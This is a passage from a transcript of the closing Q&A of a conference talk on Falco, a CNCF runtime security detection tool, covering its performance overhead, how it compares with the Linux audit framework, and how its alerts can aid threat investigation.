as you go back and forth between security approaches with prevention and security approaches with detection. So if you wanna get involved with any of these projects, they're all CNCF projects. Myself and I'm sure many other maintainers here would love to have you involved, so feel free to reach out to any of us,
39:21
and if anybody has any questions, I think I have about seven or eight minutes left, and while we have the environment on the screen, I'm happy to answer questions or show folks things or anything for that matter. So thank you all for coming. I'm Chris Nova.
39:46
And then one thing, as people start leaving the room, if somebody has a question, I'm gonna say the question back for the recording, so just try to be patient with us as we do the audio relaying here.
40:00
Can I take one or two? Yeah, yeah, go for it. And what is the performance?
40:22
I can't hear you. What is the performance impact of Falco on the? You have to yell at me. What is the performance impact of Falco on systems? Negligible. So the question was, and I'll save this for the recording,
40:41
the question was what's the impact of Falco on the underlying system, and my response was negligible. And the reason for that was because, again, 16 megabytes per core, and it's written in C++. So we've got some documents out there on the internet. I'll add one to the markdown document here where we have folks running upwards of 2,000 nodes in Kubernetes,
41:02
all running Falco and still able to maintain their other production loads just fine. In fact, Skyscanner, a company, just released a blog post that I'll put a link to; they have wonderful metrics where they've been doing load testing and benchmarking with Falco, and you can see the performance of it.
41:20
Yeah, if you have questions, just come right up here, and we'll answer them for the recording. How does this compare to the standard Linux audit framework? How does this compare to the standard Linux audit framework? So it does similar things, but it takes it a step further when you start looking at how we're able to enrich that otherwise Linux-only information
41:43
with Kubernetes, with containers, with other bits of information and data streams coming out of your system. We're right now building a new API for inputs, allowing dynamic inputs being loaded into Falco, so we could potentially start to stream information about IO block devices, XDP,
42:01
the rest of the Linux kernel, and other things happening on your system, and building hybrid objects with all of these input streams that takes it a step further than Linux audit. The question was, do we plan to replace the Linux audit framework
42:20
with Falco? Absolutely not. What we wanna do is we wanna make Falco and the community around Falco mature enough to where we could start to use tools like the Linux audit framework in conjunction with these other tools and assert rules against all of this information coming into Falco. Yeah, what's up?
42:43
Thank you very much, a really nice talk. My question would be, is it possible to turn the shield into a weapon, meaning that somebody using Falco and observing those kernel events and calls could discover other vulnerabilities in the system
43:02
by just playing around? So the question here was, would it be possible to discover other vulnerabilities in a system just by playing around with Falco or just seeing what Falco has to say? And I think that was one of the lessons that I was trying to allude to, which is giving an environment where we're taking alerts like this,
43:21
potentially this would be able to be your first glimpse into building the more mature threat model of understanding what actually happened. In my example, I just kind of did it in the reverse way, like I sort of did it backwards where I showed you the threat model and then I showed you what Falco has to say about it. But the idea here is that by detecting anomalies that are well known in Linux,
43:41
you would potentially be able to start a journey into discovering a CVE, remote command injection, a rootkit, whatever. Yeah, yeah, does anybody want Falco stickers? I've got some more up here. Come here, here. Sorry, there's, I don't know how many are left. There's one, there's some there.
44:01
Have fun. Any other questions? I'm gonna kinda go stand over here if folks wanna come meet me, but I'm just about out of time, so I gotta get out of here and let the next person get ready. Thanks for coming, everyone. Thank you. Thank you. Thank you.